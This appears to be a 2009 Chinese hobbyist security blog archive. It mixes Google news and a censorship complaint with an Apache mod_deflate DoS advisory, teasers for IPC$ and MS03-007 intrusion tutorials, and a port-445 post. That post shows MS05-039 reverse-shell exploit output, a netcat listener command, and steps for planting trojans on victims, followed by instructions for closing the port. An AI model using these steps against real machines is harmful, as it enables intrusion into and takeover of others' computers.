祝贺邮件
收到Google发来的祝贺邮件!
十二
28
2009
28
2009
十二
27
2009
27
2009
十二
27
2009
27
2009
google wave
今天我们为大家整理出了一些关于Google Wave的链接,以便大家更好的理解Wave。
- 谷奥:Google Wave,新Web时代的沟通平台(多图,多视频)
- 谷奥:Google Wave中的一些概念解释
- 谷奥:Google Wave 发布会之后的问答时间
- TechCrunch 超级访问 Google Wave 开发人员
- Google Wave API:Wave API允许开发者将Wave嵌入他们的Web Service中,并且可以利用API开发Wave的gadget以及extension
- Google Wave Protocol:了解未来的Wave协议。
- Google Wave press site:一个包括Wave的图片,团队介绍等信息的网站
- Google Wave Sandbox:开发中的Wave网站,需要测试帐号,我相信现在正在有人尝试暴力破解。。。
- Google Wave Developer blog:Wave开发者blog
- Google’s introductory blog post:介绍Wave的由来的一篇blog
转自:谷奥
十二
22
2009
22
2009
真无语
我天朝就是烈害!想把天朝网络变成一个局域网,都说网络是最自由的,到了天朝就特色了!我在Google里搜索“翻墙”。你就挨个点吧!祝你好运!
十二
20
2009
20
2009
Apache 'mod_deflate'远程拒绝服务漏洞
影响版本:
Apache Software Foundation Apache 2.2.11
Apache Software Foundation Apache 2.2.10
Apache Software Foundation Apache 2.2.9
Apache Software Foundation Apache 2.2.8
Apache Software Foundation Apache 2.2.6
Apache Software Foundation Apache 2.2.5
Apache Software Foundation Apache 2.2.4
Apache Software Foundation Apache 2.2.3
Apache Software Foundation Apache 2.2.2
Apache Software Foundation Apache 2.2.7-dev
Apache Software Foundation Apache 2.2.6-dev
Apache Software Foundation Apache 2.2.5-dev
Apache Software Foundation Apache 2.2.1
Apache Software Foundation Apache 2.2漏洞描述:
Bugraq ID: 35623
CVE ID:CVE-2009-1891
Apache是一款流行HTTP服务程序。
Apache mod_deflat模块不正确处理特殊请求,远程攻击者可以利用漏洞使服务程序崩溃。
当mod_deflate启用时下载一个文件,在结束之前中止连接,会使CPU压缩文件达到100%利用率。
即使一个不太大的文件(几MB),通过在这个文件中提交同步请求并马上中止连接,由于这个文件在平行过程中多次压缩,可导致消耗大量CPU时间而造成拒绝服务攻击。<*参考
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=534712
*>
SEBUG安全建议:
用户可参考如下链接获得补丁信息:
http://svn.apache.org/viewvc?view=rev&revision=791454
十二
20
2009
20
2009
IPC$入侵
一 唠叨一下:这个漏洞已经很老了,但是今天在网吧溢出445端口的时候,没有得到shell倒是得到了一个空连接,所以值得再贴一下。网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! (全文…)
十二
20
2009
20
2009
MS03-007漏洞利用
一、 漏洞基本情况
1、 漏洞名称及描述
名称:Microsoft Windows 2000 WebDAV远程缓冲区溢出漏洞
微软安全公告:MS03-007
Unchecked Buffer In Windows Component Could Cause Web Server Compromise(815021)
地址_blank href=http://www.microsoft.com/technet/security/bulletin/MS03-007.asp>
http://www.microsoft.com/technet/security/bulletin/MS03-007.asp
描述:IIS 5.0包含的WebDAV组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏洞
对WebDAV进行缓冲区溢出攻击,可能以Web进程权限在系统上执行任意指令。 (全文…)
十二
19
2009
19
2009
飘摇
一个flash,很抒情,声明可不是我制作的啊!
十二
19
2009
19
2009
十二
19
2009
19
2009
445端口入侵
C:\445>ms05039.exe 192.168.0.13 192.168.0.11 1234 1
MS05-039 Windows PnP Remote Overflow Exploit
Connect back shellcode Edition By superlone[EST]
Tested On Windows 2000 PRO SP4 CN
[+] Trying to connect to remote port on192.168.0.13:445…ESTABLISHED
[+] Making null session…OK
[+]Trying to bind pipe…OK
[+]Exploit done!Check your reverse shell on 192.168.0.11:1234
C:\445>nc.exe -vv -l -p 1234
listening on [any] 1234 …
445 端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口 偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉!我们所能做的就是想办法不让黑客有机可乘,封堵住445端口漏洞。简单起见,本文中都以Windows 2000为例,对于Windows XP,步骤基本类似。
第一步,我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到!比如SUPERSCAN这个端口扫描工具。
第二步,假设现在我们已经得到一台存在445端口漏洞的主机,那么我们就可以利用瑞士军刀nc和溢出工具ms05039进行攻击:
F:\445>ms05039 目标IP 本地IP 1234
。。。 。。。
。。。 。。。
F:\445>nc.exe -vv -l -p 1234
。。。 。。。
。。。 。。。
成功的话,就会返回一个shell,然后就可以用我们常用的命令了。比如让他去下载我们的木马或上传一个木马给他,然后运行,这样得到一只肉鸡了。
看了上面的这些,是不是觉得自己的电脑很危险?不用怕,下面我们就来解除这危险的445端口漏洞:
防范445端口漏洞的攻击方法:
1.端口排除法
这种方法利用了Windows 2000系统的端口排除功能将来自于445端口的所有信息包全部禁止掉,让“大
恶人”们无法接近你的主机,下面是这种方法的具体实现步骤:
打开Windows 2000系统的开始菜单,选中“设置”项下面的“网络和拨号连接”图标,并用鼠标右键单击之,从其后的快捷菜单中,单击“浏览”命令;
在接着出现的窗口中,右击“Internet连接”图标,选中“属性”选项,弹出Internet连接属性窗口;
打开“常规”标签页面,将其中的“Internet协议(TCP/IP)”项选中,然后再单击一下“属性”按钮,打开Internet协议(TCP/IP)属性设置页面;
继续单击该页面中的“高级”按钮,打开高级TCP/IP设置窗口,选中其中的“选项”标签,并在该标签页面的“可选的设置”项中,将“TCP/IP筛选”选中,再单击一下对应的“属性”按钮,打开TCP/IP筛选的设置口;
由 于445端口属于一种TCP端口,你可以在对应“TCP端口”的设置项处,将“只允许”项选中,激活下面的“添加”按钮,单击该按钮,在其后打开的“添加 筛选器”窗口中,将必须用到的几个服务端口号码,都添加进来,而将用不到的445端口号码排除在外,设置完毕后,单击“确定”按钮,就可以让设置生效了。
2.服务关闭法
考虑到文件夹或打印机共享服务才会利用到445端口,因此直接将文件夹或打印机共享服务停止掉,同样也能实现关闭445端口的目的,让黑客无法破坏各种共享资源,下面是关闭文件夹或打印机共享服务的具体步骤:
打开Windows 2000系统的开始菜单,选中“设置”项下面的“网络和拨号连接”图标,并用鼠标右键单击之,从其后的快捷菜单中,单击“浏览”命令;
在接着出现的窗口中,右击“Internet连接”图标,选中“属性”选项,弹出Internet连接属性窗口;
打开“常规”标签页面,并在“此连接使用下列选定的组件”列表框中,将“Microsoft网络的文件或打印机共享”选项前面的勾号取消,如图2所示。最后单击“确定”按钮,重新启动系统,Internet上的“大恶人”们就没有权利访问到各种共享资源了。
当然,你也可以在不停止共享服务的条件下,剥夺“大恶人”们的共享访问权利;利用本地安全设置中的“用户权利指派”功能,指定Internet上的任何用户都无权访问本地主机,具体步骤为:
在Windows 2000系统的开始菜单中,依次单击“程序” “管理工具” “本地安全设置”选项,接着展开“安全设置” “本地策略” “用户权利指派”文件夹,在对应的右边子窗口中选中“拒绝从网络访问这台计算机”选项,并用鼠标左键双击之;
打开设置窗口后,单击“添加”按钮,从弹出的“选择用户或组”对话框中选中“everyone”选项,再单击“添加”按钮,最后单击“确定”,这样任何一位用户都无法从网络访问到本地主机。